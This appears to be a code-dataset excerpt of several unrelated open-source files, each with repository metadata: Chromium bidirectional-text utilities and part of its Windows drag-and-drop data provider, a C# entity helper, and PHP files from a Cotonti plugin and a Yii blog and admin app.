bool AdjustStringForLocaleDirection(string16* text) {
if (!IsRTL() || text->empty())
return false;
// Marking the string as LTR if the locale is RTL and the string does not
// contain strong RTL characters. Otherwise, mark the string as RTL.
bool has_rtl_chars = StringContainsStrongRTLChars(*text);
if (!has_rtl_chars)
WrapStringWithLTRFormatting(text);
else
WrapStringWithRTLFormatting(text);
return true;
}
bool UnadjustStringForLocaleDirection(string16* text) {
if (!IsRTL() || text->empty())
return false;
*text = StripWrappingBidiControlCharacters(*text);
return true;
}
#else
bool AdjustStringForLocaleDirection(string16* text) {
// On OS X & GTK the directionality of a label is determined by the first
// strongly directional character.
// However, we want to make sure that in an LTR-language-UI all strings are
// left aligned and vice versa.
// A problem can arise if we display a string which starts with user input.
// User input may be of the opposite directionality to the UI. So the whole
// string will be displayed in the opposite directionality, e.g. if we want to
// display in an LTR UI [such as US English]:
//
// EMAN_NOISNETXE is now installed.
//
// Since EXTENSION_NAME begins with a strong RTL char, the label's
// directionality will be set to RTL and the string will be displayed visually
// as:
//
// .is now installed EMAN_NOISNETXE
//
// In order to solve this issue, we prepend an LRM to the string. An LRM is a
// strongly directional LTR char.
// We also append an LRM at the end, which ensures that we're in an LTR
// context.
// Unlike Windows, Linux and OS X can correctly display RTL glyphs out of the
// box so there is no issue with displaying zero-width bidi control characters
// on any system. Thus no need for the !IsRTL() check here.
if (text->empty())
return false;
bool ui_direction_is_rtl = IsRTL();
bool has_rtl_chars = StringContainsStrongRTLChars(*text);
if (!ui_direction_is_rtl && has_rtl_chars) {
WrapStringWithRTLFormatting(text);
text->insert(0U, 1U, kLeftToRightMark);
text->push_back(kLeftToRightMark);
} else if (ui_direction_is_rtl && has_rtl_chars) {
WrapStringWithRTLFormatting(text);
text->insert(0U, 1U, kRightToLeftMark);
text->push_back(kRightToLeftMark);
} else if (ui_direction_is_rtl) {
WrapStringWithLTRFormatting(text);
text->insert(0U, 1U, kRightToLeftMark);
text->push_back(kRightToLeftMark);
} else {
return false;
}
return true;
}
bool UnadjustStringForLocaleDirection(string16* text) {
if (text->empty())
return false;
size_t begin_index = 0;
char16 begin = text->at(begin_index);
if (begin == kLeftToRightMark ||
begin == kRightToLeftMark) {
++begin_index;
}
size_t end_index = text->length() - 1;
char16 end = text->at(end_index);
if (end == kLeftToRightMark ||
end == kRightToLeftMark) {
--end_index;
}
string16 unmarked_text =
text->substr(begin_index, end_index - begin_index + 1);
*text = StripWrappingBidiControlCharacters(unmarked_text);
return true;
}
#endif // !OS_WIN
bool StringContainsStrongRTLChars(const string16& text) {
const UChar* string = text.c_str();
size_t length = text.length();
size_t position = 0;
while (position < length) {
UChar32 character;
size_t next_position = position;
U16_NEXT(string, next_position, length, character);
// Now that we have the character, we use ICU in order to query for the
// appropriate Unicode BiDi character type.
int32_t property = u_getIntPropertyValue(character, UCHAR_BIDI_CLASS);
if ((property == U_RIGHT_TO_LEFT) || (property == U_RIGHT_TO_LEFT_ARABIC))
return true;
position = next_position;
}
return false;
}
void WrapStringWithLTRFormatting(string16* text) {
if (text->empty())
return;
// Inserting an LRE (Left-To-Right Embedding) mark as the first character.
text->insert(0U, 1U, kLeftToRightEmbeddingMark);
// Inserting a PDF (Pop Directional Formatting) mark as the last character.
text->push_back(kPopDirectionalFormatting);
}
void WrapStringWithRTLFormatting(string16* text) {
if (text->empty())
return;
// Inserting an RLE (Right-To-Left Embedding) mark as the first character.
text->insert(0U, 1U, kRightToLeftEmbeddingMark);
// Inserting a PDF (Pop Directional Formatting) mark as the last character.
text->push_back(kPopDirectionalFormatting);
}
void WrapPathWithLTRFormatting(const FilePath& path,
string16* rtl_safe_path) {
// Wrap the overall path with LRE-PDF pair which essentialy marks the
// string as a Left-To-Right string.
// Inserting an LRE (Left-To-Right Embedding) mark as the first character.
rtl_safe_path->push_back(kLeftToRightEmbeddingMark);
#if defined(OS_MACOSX)
rtl_safe_path->append(UTF8ToUTF16(path.value()));
#elif defined(OS_WIN)
rtl_safe_path->append(path.value());
#else // defined(OS_POSIX) && !defined(OS_MACOSX)
std::wstring wide_path = base::SysNativeMBToWide(path.value());
rtl_safe_path->append(WideToUTF16(wide_path));
#endif
// Inserting a PDF (Pop Directional Formatting) mark as the last character.
rtl_safe_path->push_back(kPopDirectionalFormatting);
}
string16 GetDisplayStringInLTRDirectionality(const string16& text) {
// Always wrap the string in RTL UI (it may be appended to RTL string).
// Also wrap strings with an RTL first strong character direction in LTR UI.
if (IsRTL() || GetFirstStrongCharacterDirection(text) == RIGHT_TO_LEFT) {
string16 text_mutable(text);
WrapStringWithLTRFormatting(&text_mutable);
return text_mutable;
}
return text;
}
string16 StripWrappingBidiControlCharacters(const string16& text) {
if (text.empty())
return text;
size_t begin_index = 0;
char16 begin = text[begin_index];
if (begin == kLeftToRightEmbeddingMark ||
begin == kRightToLeftEmbeddingMark ||
begin == kLeftToRightOverride ||
begin == kRightToLeftOverride)
++begin_index;
size_t end_index = text.length() - 1;
if (text[end_index] == kPopDirectionalFormatting)
--end_index;
return text.substr(begin_index, end_index - begin_index + 1);
}
} // namespace i18n
} // namespace base
| ChromiumWebApps/chromium | base/i18n/rtl.cc | C++ | bsd-3-clause | 13,232 |
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Diagnostics;
using System.Reflection;
namespace AppGene.Common.Entities.Infrastructure.Inferences
{
public class ReferencePropertyGetter
{
/// <summary>
/// Gets the reference columns.
/// </summary>
/// <param name="context">The entity analysis context.</param>
/// <returns>The reference columns.</returns>
public virtual IList<PropertyInfo> GetProperties(EntityAnalysisContext context)
{
var displayProperties = new List<PropertyInfo>();
// Find sort columns from DisplayColumnAttributes
var displayColumnAttribute = context.EntityType.GetCustomAttribute<DisplayColumnAttribute>();
if (displayColumnAttribute != null)
{
string[] displayColumns = displayColumnAttribute.DisplayColumn.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
foreach (var column in displayColumns)
{
var columnName = column.Trim();
PropertyInfo displayProperty = context.EntityType.GetProperty(columnName);
Debug.Assert(displayProperty != null);
displayProperties.Add(displayProperty);
}
if (displayProperties.Count > 0)
{
// Return
return displayProperties;
}
}
// Find display columns by characteristic
string[] displayCharacteristic = new string[] { "Code", "Name" };
var properties = EntityAnalysisHelper.GetCharacteristicPropertyInfo(context.EntityType, displayCharacteristic);
foreach (var character in displayCharacteristic)
{
PropertyInfo property;
if (properties.TryGetValue(character, out property))
{
displayProperties.Add(property);
}
}
return displayProperties;
}
}
} | snyang/AppGene | Development/AppGene/AppGene.Common.Entities.Infrastructure/Inferences/ReferencePropertyGetter.cs | C# | bsd-3-clause | 2,191 |
<?php
/**
* [BEGIN_COT_EXT]
* Hooks=page.add.tags, page.edit.tags
* [END_COT_EXT]
*/
/**
* plugin landingextrapage for Cotonti Siena
*
* @package landingextrapage
* @version 1.0.0
* @author esclkm
* @copyright
* @license BSD
* */
// Generated by Cotonti developer tool (littledev.ru)
defined('COT_CODE') or die('Wrong URL.');
require_once cot_langfile('landingextrapage', 'plug');
require_once cot_incfile('landingextrapage', 'plug');
$lep = new landingextrapage($pag['page_landingextrapage']);
$t->assign('LANDINGINDEXPAGE', $lep->editform());
| esclkm/hod | plugins/landingextrapage/landingextrapage.page.add.tags.php | PHP | bsd-3-clause | 568 |
<?php
namespace backend\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use common\models\Post;
/**
* PostSearch represents the model behind the search form about `common\models\Post`.
*/
class PostSearch extends Post
{
/**
* @inheritdoc
*/
public function rules()
{
return [
[['id', 'created_by', 'blog_category_id', 'status', 'comment_status', 'comment_count', 'views'], 'integer'],
[['title', 'excerpt', 'body', 'publish_up', 'publish_down'], 'safe'],
];
}
/**
* @inheritdoc
*/
public function scenarios()
{
// bypass scenarios() implementation in the parent class
return Model::scenarios();
}
/**
* Creates data provider instance with search query applied
*
* @param array $params
*
* @return ActiveDataProvider
*/
public function search($params)
{
$query = Post::find();
// add conditions that should always apply here
$dataProvider = new ActiveDataProvider([
'query' => $query,
]);
$this->load($params);
if (!$this->validate()) {
// uncomment the following line if you do not want to return any records when validation fails
// $query->where('0=1');
return $dataProvider;
}
// grid filtering conditions
$query->andFilterWhere([
'id' => $this->id,
'created_by' => $this->created_by,
'blog_category_id' => $this->blog_category_id,
'status' => $this->status,
'comment_status' => $this->comment_status,
'comment_count' => $this->comment_count,
'views' => $this->views,
'publish_up' => $this->publish_up,
'publish_down' => $this->publish_down,
]);
$query->andFilterWhere(['like', 'title', $this->title])
->andFilterWhere(['like', 'excerpt', $this->excerpt])
->andFilterWhere(['like', 'body', $this->body]);
return $dataProvider;
}
}
| rob94/BlogYii | backend/models/PostSearch.php | PHP | bsd-3-clause | 2,100 |
<?php
use yii\helpers\Html;
use yii\grid\GridView;
/* @var $this yii\web\View */
/* @var $searchModel backend\models\FilialSearch */
/* @var $dataProvider yii\data\ActiveDataProvider */
$this->title = 'Филилы организаций';
$this->params['breadcrumbs'][] = $this->title;
if (Yii::$app->user->can('manager'))
$template = '{view} - {update}';
else
$template = '{view}';
?>
<div class="filial-index">
<h1><?= Html::encode($this->title) ?></h1>
<?php // echo $this->render('_search', ['model' => $searchModel]); ?>
<p>
<?php if (Yii::$app->user->can('manager')) echo Html::a('Создать филиал', ['create'], ['class' => 'btn btn-success']) ?>
</p>
<?= GridView::widget([
'dataProvider' => $dataProvider,
'filterModel' => $searchModel,
'columns' => [
['class' => 'yii\grid\SerialColumn'],
[
'attribute' => 'idCompany',
'value' => 'idCompany.name',
// 'filter'=>$searchModel->getAllCompanyGrid(),
],
[
'attribute' => 'idTown',
'value' => 'idTown.name',
// 'filter'=>$searchModel->getAllPlacetownGrid(),
],
'address',
// 'info',
['class' => 'yii\grid\ActionColumn',
'header'=>'Действия',
'headerOptions' => ['width' => '80'],
'template' => $template,
],
],
]); ?>
</div> | N1kolayS/PCExpert | backend/views/filial/index.php | PHP | bsd-3-clause | 1,530 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/base/dragdrop/os_exchange_data_provider_win.h"
#include <algorithm>
#include <vector>
#include "base/file_path.h"
#include "base/i18n/file_util_icu.h"
#include "base/logging.h"
#include "base/memory/scoped_handle.h"
#include "base/pickle.h"
#include "base/stl_util.h"
#include "base/utf_string_conversions.h"
#include "base/win/scoped_hglobal.h"
#include "googleurl/src/gurl.h"
#include "grit/ui_strings.h"
#include "net/base/net_util.h"
#include "ui/base/clipboard/clipboard_util_win.h"
#include "ui/base/l10n/l10n_util.h"
namespace ui {
// Creates a new STGMEDIUM object to hold the specified text. The caller
// owns the resulting object. The "Bytes" version does not NULL terminate, the
// string version does.
static STGMEDIUM* GetStorageForBytes(const char* data, size_t bytes);
static STGMEDIUM* GetStorageForString16(const string16& data);
static STGMEDIUM* GetStorageForString(const std::string& data);
// Creates the contents of an Internet Shortcut file for the given URL.
static void GetInternetShortcutFileContents(const GURL& url, std::string* data);
// Creates a valid file name given a suggested title and URL.
static void CreateValidFileNameFromTitle(const GURL& url,
const string16& title,
string16* validated);
// Creates a new STGMEDIUM object to hold a file.
static STGMEDIUM* GetStorageForFileName(const FilePath& path);
// Creates a File Descriptor for the creation of a file to the given URL and
// returns a handle to it.
static STGMEDIUM* GetStorageForFileDescriptor(const FilePath& path);
///////////////////////////////////////////////////////////////////////////////
// FormatEtcEnumerator
//
// This object implements an enumeration interface. The existence of an
// implementation of this interface is exposed to clients through
// OSExchangeData's EnumFormatEtc method. Our implementation is nobody's
// business but our own, so it lives in this file.
//
// This Windows API is truly a gem. It wants to be an enumerator but assumes
// some sort of sequential data (why not just use an array?). See comments
// throughout.
//
class FormatEtcEnumerator : public IEnumFORMATETC {
public:
FormatEtcEnumerator(DataObjectImpl::StoredData::const_iterator begin,
DataObjectImpl::StoredData::const_iterator end);
~FormatEtcEnumerator();
// IEnumFORMATETC implementation:
HRESULT __stdcall Next(
ULONG count, FORMATETC* elements_array, ULONG* elements_fetched);
HRESULT __stdcall Skip(ULONG skip_count);
HRESULT __stdcall Reset();
HRESULT __stdcall Clone(IEnumFORMATETC** clone);
// IUnknown implementation:
HRESULT __stdcall QueryInterface(const IID& iid, void** object);
ULONG __stdcall AddRef();
ULONG __stdcall Release();
private:
// This can only be called from |CloneFromOther|, since it initializes the
// contents_ from the other enumerator's contents.
FormatEtcEnumerator() : cursor_(0), ref_count_(0) {
}
// Clone a new FormatEtc from another instance of this enumeration.
static FormatEtcEnumerator* CloneFromOther(const FormatEtcEnumerator* other);
private:
// We are _forced_ to use a vector as our internal data model as Windows'
// retarded IEnumFORMATETC API assumes a deterministic ordering of elements
// through methods like Next and Skip. This exposes the underlying data
// structure to the user. Bah.
std::vector<FORMATETC*> contents_;
// The cursor of the active enumeration - an index into |contents_|.
size_t cursor_;
LONG ref_count_;
DISALLOW_COPY_AND_ASSIGN(FormatEtcEnumerator);
};
// Safely makes a copy of all of the relevant bits of a FORMATETC object.
static void CloneFormatEtc(FORMATETC* source, FORMATETC* clone) {
*clone = *source;
if (source->ptd) {
source->ptd =
static_cast<DVTARGETDEVICE*>(CoTaskMemAlloc(sizeof(DVTARGETDEVICE)));
*(clone->ptd) = *(source->ptd);
}
}
FormatEtcEnumerator::FormatEtcEnumerator(
DataObjectImpl::StoredData::const_iterator start,
DataObjectImpl::StoredData::const_iterator end)
: ref_count_(0), cursor_(0) {
// Copy FORMATETC data from our source into ourselves.
while (start != end) {
FORMATETC* format_etc = new FORMATETC;
CloneFormatEtc(&(*start)->format_etc, format_etc);
contents_.push_back(format_etc);
++start;
}
}
FormatEtcEnumerator::~FormatEtcEnumerator() {
STLDeleteContainerPointers(contents_.begin(), contents_.end());
}
STDMETHODIMP FormatEtcEnumerator::Next(
ULONG count, FORMATETC* elements_array, ULONG* elements_fetched) {
// MSDN says |elements_fetched| is allowed to be NULL if count is 1.
if (!elements_fetched)
DCHECK_EQ(count, 1ul);
// This method copies count elements into |elements_array|.
ULONG index = 0;
while (cursor_ < contents_.size() && index < count) {
CloneFormatEtc(contents_[cursor_], &elements_array[index]);
++cursor_;
++index;
}
// The out param is for how many we actually copied.
if (elements_fetched)
*elements_fetched = index;
// If the two don't agree, then we fail.
return index == count ? S_OK : S_FALSE;
}
STDMETHODIMP FormatEtcEnumerator::Skip(ULONG skip_count) {
cursor_ += skip_count;
// MSDN implies it's OK to leave the enumerator trashed.
// "Whatever you say, boss"
return cursor_ <= contents_.size() ? S_OK : S_FALSE;
}
STDMETHODIMP FormatEtcEnumerator::Reset() {
cursor_ = 0;
return S_OK;
}
STDMETHODIMP FormatEtcEnumerator::Clone(IEnumFORMATETC** clone) {
// Clone the current enumerator in its exact state, including cursor.
FormatEtcEnumerator* e = CloneFromOther(this);
e->AddRef();
*clone = e;
return S_OK;
}
STDMETHODIMP FormatEtcEnumerator::QueryInterface(const IID& iid,
void** object) {
*object = NULL;
if (IsEqualIID(iid, IID_IUnknown) || IsEqualIID(iid, IID_IEnumFORMATETC)) {
*object = this;
} else {
return E_NOINTERFACE;
}
AddRef();
return S_OK;
}
ULONG FormatEtcEnumerator::AddRef() {
return InterlockedIncrement(&ref_count_);
}
ULONG FormatEtcEnumerator::Release() {
if (InterlockedDecrement(&ref_count_) == 0) {
ULONG copied_refcnt = ref_count_;
delete this;
return copied_refcnt;
}
return ref_count_;
}
// static
FormatEtcEnumerator* FormatEtcEnumerator::CloneFromOther(
const FormatEtcEnumerator* other) {
FormatEtcEnumerator* e = new FormatEtcEnumerator;
// Copy FORMATETC data from our source into ourselves.
std::vector<FORMATETC*>::const_iterator start = other->contents_.begin();
while (start != other->contents_.end()) {
FORMATETC* format_etc = new FORMATETC;
CloneFormatEtc(*start, format_etc);
e->contents_.push_back(format_etc);
++start;
}
// Carry over
e->cursor_ = other->cursor_;
return e;
}
///////////////////////////////////////////////////////////////////////////////
// OSExchangeDataProviderWin, public:
// static
bool OSExchangeDataProviderWin::HasPlainTextURL(IDataObject* source) {
string16 plain_text;
return (ClipboardUtil::GetPlainText(source, &plain_text) &&
!plain_text.empty() && GURL(plain_text).is_valid());
}
// static
bool OSExchangeDataProviderWin::GetPlainTextURL(IDataObject* source,
GURL* url) {
string16 plain_text;
if (ClipboardUtil::GetPlainText(source, &plain_text) &&
!plain_text.empty()) {
GURL gurl(plain_text);
if (gurl.is_valid()) {
*url = gurl;
return true;
}
}
return false;
}
// static
DataObjectImpl* OSExchangeDataProviderWin::GetDataObjectImpl(
const OSExchangeData& data) {
return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
data_.get();
}
// static
IDataObject* OSExchangeDataProviderWin::GetIDataObject(
const OSExchangeData& data) {
return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
data_object();
}
// static
IDataObjectAsyncCapability* OSExchangeDataProviderWin::GetIAsyncOperation(
const OSExchangeData& data) {
return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
async_operation();
}
OSExchangeDataProviderWin::OSExchangeDataProviderWin(IDataObject* source)
: data_(new DataObjectImpl()),
source_object_(source) {
}
OSExchangeDataProviderWin::OSExchangeDataProviderWin()
: data_(new DataObjectImpl()),
source_object_(data_.get()) {
}
OSExchangeDataProviderWin::~OSExchangeDataProviderWin() {
}
void OSExchangeDataProviderWin::SetString(const string16& data) {
STGMEDIUM* storage = GetStorageForString16(data);
data_->contents_.push_back(
new DataObjectImpl::StoredDataInfo(CF_UNICODETEXT, storage));
// Also add plain text.
storage = GetStorageForString(UTF16ToUTF8(data));
data_->contents_.push_back(
new DataObjectImpl::StoredDataInfo(CF_TEXT, storage));
}
void OSExchangeDataProviderWin::SetURL(const GURL& url,
const string16& title) {
// NOTE WELL:
// Every time you change the order of the first two CLIPFORMATS that get
// added here, you need to update the EnumerationViaCOM test case in
// the _unittest.cc file to reflect the new arrangement otherwise that test
// will fail! It assumes an insertion order.
// Add text/x-moz-url for drags from Firefox
string16 x_moz_url_str = UTF8ToUTF16(url.spec());
x_moz_url_str += '\n';
x_moz_url_str += title;
STGMEDIUM* storage = GetStorageForString16(x_moz_url_str);
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetMozUrlFormat()->cfFormat, storage));
// Add a .URL shortcut file for dragging to Explorer.
string16 valid_file_name;
CreateValidFileNameFromTitle(url, title, &valid_file_name);
std::string shortcut_url_file_contents;
GetInternetShortcutFileContents(url, &shortcut_url_file_contents);
SetFileContents(FilePath(valid_file_name), shortcut_url_file_contents);
// Add a UniformResourceLocator link for apps like IE and Word.
storage = GetStorageForString16(UTF8ToUTF16(url.spec()));
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetUrlWFormat()->cfFormat, storage));
storage = GetStorageForString(url.spec());
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetUrlFormat()->cfFormat, storage));
// TODO(beng): add CF_HTML.
// http://code.google.com/p/chromium/issues/detail?id=6767
// Also add text representations (these should be last since they're the
// least preferable).
storage = GetStorageForString16(UTF8ToUTF16(url.spec()));
data_->contents_.push_back(
new DataObjectImpl::StoredDataInfo(CF_UNICODETEXT, storage));
storage = GetStorageForString(url.spec());
data_->contents_.push_back(
new DataObjectImpl::StoredDataInfo(CF_TEXT, storage));
}
void OSExchangeDataProviderWin::SetFilename(const FilePath& path) {
STGMEDIUM* storage = GetStorageForFileName(path);
DataObjectImpl::StoredDataInfo* info =
new DataObjectImpl::StoredDataInfo(CF_HDROP, storage);
data_->contents_.push_back(info);
}
void OSExchangeDataProviderWin::SetFilenames(
const std::vector<OSExchangeData::FileInfo>& filenames) {
for (size_t i = 0; i < filenames.size(); ++i) {
STGMEDIUM* storage = GetStorageForFileName(filenames[i].path);
DataObjectImpl::StoredDataInfo* info =
new DataObjectImpl::StoredDataInfo(CF_HDROP, storage);
data_->contents_.push_back(info);
}
}
void OSExchangeDataProviderWin::SetPickledData(CLIPFORMAT format,
const Pickle& data) {
STGMEDIUM* storage = GetStorageForBytes(static_cast<const char*>(data.data()),
data.size());
data_->contents_.push_back(
new DataObjectImpl::StoredDataInfo(format, storage));
}
void OSExchangeDataProviderWin::SetFileContents(
const FilePath& filename,
const std::string& file_contents) {
// Add CFSTR_FILEDESCRIPTOR
STGMEDIUM* storage = GetStorageForFileDescriptor(filename);
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetFileDescriptorFormat()->cfFormat, storage));
// Add CFSTR_FILECONTENTS
storage = GetStorageForBytes(file_contents.data(), file_contents.length());
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetFileContentFormatZero(), storage));
}
void OSExchangeDataProviderWin::SetHtml(const string16& html,
const GURL& base_url) {
// Add both MS CF_HTML and text/html format. CF_HTML should be in utf-8.
std::string utf8_html = UTF16ToUTF8(html);
std::string url = base_url.is_valid() ? base_url.spec() : std::string();
std::string cf_html = ClipboardUtil::HtmlToCFHtml(utf8_html, url);
STGMEDIUM* storage = GetStorageForBytes(cf_html.c_str(), cf_html.size());
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetHtmlFormat()->cfFormat, storage));
STGMEDIUM* storage_plain = GetStorageForBytes(utf8_html.c_str(),
utf8_html.size());
data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetTextHtmlFormat()->cfFormat, storage_plain));
}
bool OSExchangeDataProviderWin::GetString(string16* data) const {
return ClipboardUtil::GetPlainText(source_object_, data);
}
bool OSExchangeDataProviderWin::GetURLAndTitle(GURL* url,
string16* title) const {
string16 url_str;
bool success = ClipboardUtil::GetUrl(source_object_, &url_str, title, true);
if (success) {
GURL test_url(url_str);
if (test_url.is_valid()) {
*url = test_url;
return true;
}
} else if (GetPlainTextURL(source_object_, url)) {
if (url->is_valid())
*title = net::GetSuggestedFilename(*url, "", "", "", "", std::string());
else
title->clear();
return true;
}
return false;
}
bool OSExchangeDataProviderWin::GetFilename(FilePath* path) const {
std::vector<string16> filenames;
bool success = ClipboardUtil::GetFilenames(source_object_, &filenames);
if (success)
*path = FilePath(filenames[0]);
return success;
}
bool OSExchangeDataProviderWin::GetFilenames(
std::vector<OSExchangeData::FileInfo>* filenames) const {
std::vector<string16> filenames_local;
bool success = ClipboardUtil::GetFilenames(source_object_, &filenames_local);
if (success) {
for (size_t i = 0; i < filenames_local.size(); ++i)
filenames->push_back(
OSExchangeData::FileInfo(FilePath(filenames_local[i]), FilePath()));
}
return success;
}
bool OSExchangeDataProviderWin::GetPickledData(CLIPFORMAT format,
Pickle* data) const {
DCHECK(data);
FORMATETC format_etc =
{ format, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };
bool success = false;
STGMEDIUM medium;
if (SUCCEEDED(source_object_->GetData(&format_etc, &medium))) {
if (medium.tymed & TYMED_HGLOBAL) {
base::win::ScopedHGlobal<char> c_data(medium.hGlobal);
DCHECK_GT(c_data.Size(), 0u);
*data = Pickle(c_data.get(), static_cast<int>(c_data.Size()));
success = true;
}
ReleaseStgMedium(&medium);
}
return success;
}
bool OSExchangeDataProviderWin::GetFileContents(
FilePath* filename,
std::string* file_contents) const {
string16 filename_str;
if (!ClipboardUtil::GetFileContents(source_object_, &filename_str,
file_contents)) {
return false;
}
*filename = FilePath(filename_str);
return true;
}
bool OSExchangeDataProviderWin::GetHtml(string16* html,
GURL* base_url) const {
std::string url;
bool success = ClipboardUtil::GetHtml(source_object_, html, &url);
if (success)
*base_url = GURL(url);
return success;
}
bool OSExchangeDataProviderWin::HasString() const {
return ClipboardUtil::HasPlainText(source_object_);
}
bool OSExchangeDataProviderWin::HasURL() const {
return (ClipboardUtil::HasUrl(source_object_) ||
HasPlainTextURL(source_object_));
}
bool OSExchangeDataProviderWin::HasFile() const {
return ClipboardUtil::HasFilenames(source_object_);
}
bool OSExchangeDataProviderWin::HasFileContents() const {
return ClipboardUtil::HasFileContents(source_object_);
}
bool OSExchangeDataProviderWin::HasHtml() const {
return ClipboardUtil::HasHtml(source_object_);
}
bool OSExchangeDataProviderWin::HasCustomFormat(CLIPFORMAT format) const {
FORMATETC format_etc =
{ format, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };
return (source_object_->QueryGetData(&format_etc) == S_OK);
}
void OSExchangeDataProviderWin::SetDownloadFileInfo(
const OSExchangeData::DownloadFileInfo& download) {
// If the filename is not provided, set stoarge to NULL to indicate that
// the delay rendering will be used.
STGMEDIUM* storage = NULL;
if (!download.filename.empty())
storage = GetStorageForFileName(download.filename);
// Add CF_HDROP.
DataObjectImpl::StoredDataInfo* info = new DataObjectImpl::StoredDataInfo(
ClipboardUtil::GetCFHDropFormat()->cfFormat, storage);
info->downloader = download.downloader;
data_->contents_.push_back(info);
}
#if defined(USE_AURA)
void OSExchangeDataProviderWin::SetDragImage(
const gfx::ImageSkia& image,
const gfx::Vector2d& cursor_offset) {
drag_image_ = image;
drag_image_offset_ = cursor_offset;
}
const gfx::ImageSkia& OSExchangeDataProviderWin::GetDragImage() const {
return drag_image_;
}
const gfx::Vector2d& OSExchangeDataProviderWin::GetDragImageOffset() const {
return drag_image_offset_;
}
#endif
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IDataObject implementation:
// The following function, DuplicateMedium, is derived from WCDataObject.cpp
// in the WebKit source code. This is the license information for the file:
/*
* Copyright (C) 2007 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
static void DuplicateMedium(CLIPFORMAT source_clipformat,
STGMEDIUM* source,
STGMEDIUM* destination) {
switch (source->tymed) {
case TYMED_HGLOBAL:
destination->hGlobal =
static_cast<HGLOBAL>(OleDuplicateData(
source->hGlobal, source_clipformat, 0));
break;
case TYMED_MFPICT:
destination->hMetaFilePict =
static_cast<HMETAFILEPICT>(OleDuplicateData(
source->hMetaFilePict, source_clipformat, 0));
break;
case TYMED_GDI:
destination->hBitmap =
static_cast<HBITMAP>(OleDuplicateData(
source->hBitmap, source_clipformat, 0));
break;
case TYMED_ENHMF:
destination->hEnhMetaFile =
static_cast<HENHMETAFILE>(OleDuplicateData(
source->hEnhMetaFile, source_clipformat, 0));
break;
case TYMED_FILE:
destination->lpszFileName =
static_cast<LPOLESTR>(OleDuplicateData(
source->lpszFileName, source_clipformat, 0));
break;
case TYMED_ISTREAM:
destination->pstm = source->pstm;
destination->pstm->AddRef();
break;
case TYMED_ISTORAGE:
destination->pstg = source->pstg;
destination->pstg->AddRef();
break;
}
destination->tymed = source->tymed;
destination->pUnkForRelease = source->pUnkForRelease;
if (destination->pUnkForRelease)
destination->pUnkForRelease->AddRef();
}
DataObjectImpl::DataObjectImpl()
: is_aborting_(false),
in_async_mode_(false),
async_operation_started_(false),
observer_(NULL) {
}
DataObjectImpl::~DataObjectImpl() {
StopDownloads();
STLDeleteContainerPointers(contents_.begin(), contents_.end());
if (observer_)
observer_->OnDataObjectDisposed();
}
void DataObjectImpl::StopDownloads() {
for (StoredData::iterator iter = contents_.begin();
iter != contents_.end(); ++iter) {
if ((*iter)->downloader.get()) {
(*iter)->downloader->Stop();
(*iter)->downloader = 0;
}
}
}
void DataObjectImpl::RemoveData(const FORMATETC& format) {
if (format.ptd)
return; // Don't attempt to compare target devices.
for (StoredData::iterator i = contents_.begin(); i != contents_.end(); ++i) {
if (!(*i)->format_etc.ptd &&
format.cfFormat == (*i)->format_etc.cfFormat &&
format.dwAspect == (*i)->format_etc.dwAspect &&
format.lindex == (*i)->format_etc.lindex &&
format.tymed == (*i)->format_etc.tymed) {
delete *i;
contents_.erase(i);
return;
}
}
}
void DataObjectImpl::OnDownloadCompleted(const FilePath& file_path) {
CLIPFORMAT hdrop_format = ClipboardUtil::GetCFHDropFormat()->cfFormat;
DataObjectImpl::StoredData::iterator iter = contents_.begin();
for (; iter != contents_.end(); ++iter) {
if ((*iter)->format_etc.cfFormat == hdrop_format) {
// Release the old storage.
if ((*iter)->owns_medium) {
ReleaseStgMedium((*iter)->medium);
delete (*iter)->medium;
}
// Update the storage.
(*iter)->owns_medium = true;
(*iter)->medium = GetStorageForFileName(file_path);
break;
}
}
DCHECK(iter != contents_.end());
}
void DataObjectImpl::OnDownloadAborted() {
}
HRESULT DataObjectImpl::GetData(FORMATETC* format_etc, STGMEDIUM* medium) {
if (is_aborting_)
return DV_E_FORMATETC;
StoredData::iterator iter = contents_.begin();
while (iter != contents_.end()) {
